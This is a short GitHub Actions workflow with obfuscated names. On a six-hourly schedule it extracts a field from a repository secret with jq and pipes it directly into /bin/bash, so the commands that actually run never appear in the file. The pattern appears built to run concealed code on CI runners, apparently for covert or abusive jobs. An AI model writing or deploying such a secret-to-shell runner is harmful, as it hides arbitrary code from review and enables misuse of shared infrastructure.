name: xuqianzheng4651

on:
  workflow_dispatch:
  schedule:
    - cron: '3 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: xuqianzheng4651
        env:
          kazr23: ${{ secrets.kazr23 }}
        run: |
          echo $kazr23 | jq -r .okc79 | /bin/bash
          echo $xu43489 | jq -r .jcbor5835 | /bin/bash

